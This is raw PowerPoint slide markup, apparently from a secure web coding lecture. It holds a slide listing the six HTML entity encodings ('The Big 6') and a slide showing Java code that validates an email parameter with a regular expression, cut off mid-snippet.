          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568573" y="1525777"/>
            <a:ext cx="1690373" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;amp;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494784" y="2283069"/>
            <a:ext cx="685228" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261961" y="2283069"/>
            <a:ext cx="1233515" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568573" y="2283069"/>
            <a:ext cx="1690373" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494784" y="3032251"/>
            <a:ext cx="685228" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261961" y="3032251"/>
            <a:ext cx="1233515" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568573" y="3032251"/>
            <a:ext cx="1690373" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494784" y="3785488"/>
            <a:ext cx="685228" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261961" y="3785488"/>
            <a:ext cx="1233515" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568573" y="3785488"/>
            <a:ext cx="1690373" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494784" y="4538725"/>
            <a:ext cx="685228" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261961" y="4538725"/>
            <a:ext cx="1233515" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568573" y="4538725"/>
            <a:ext cx="1690373" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x27;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2494784" y="5291960"/>
            <a:ext cx="685228" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3261961" y="5291960"/>
            <a:ext cx="1233515" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568573" y="5291960"/>
            <a:ext cx="1690373" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;#x2F;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212224" y="550175"/>
            <a:ext cx="3198002" cy="685228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Big 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1353123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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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6" presetClass="emph" presetSubtype="0" repeatCount="2000" fill="hold" grpId="2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>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0" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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0-#ppt_h/2"/>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1+#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0" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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0-#ppt_h/2"/>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="81" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="5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0-#ppt_h/2"/>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="94" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="95" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="96" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="31" grpId="1"/>
      <p:bldP spid="31"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Best Practice: Validate and Encode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3110269"/>
            <a:ext cx="8229600" cy="3016211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>String email = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("email");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>String  expression = </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"^\w+((-\w+)|(\.\w+))*\@[A-Za-z0-9]+((\.|-)[A-Za-z0-9]+)*\.[A-Za-z0-9]+$";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Pattern pattern = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Pattern.compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>expression,Pattern.CASE_INSENSITIVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Matcher matcher = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pattern.matcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(email);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>matcher.matches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
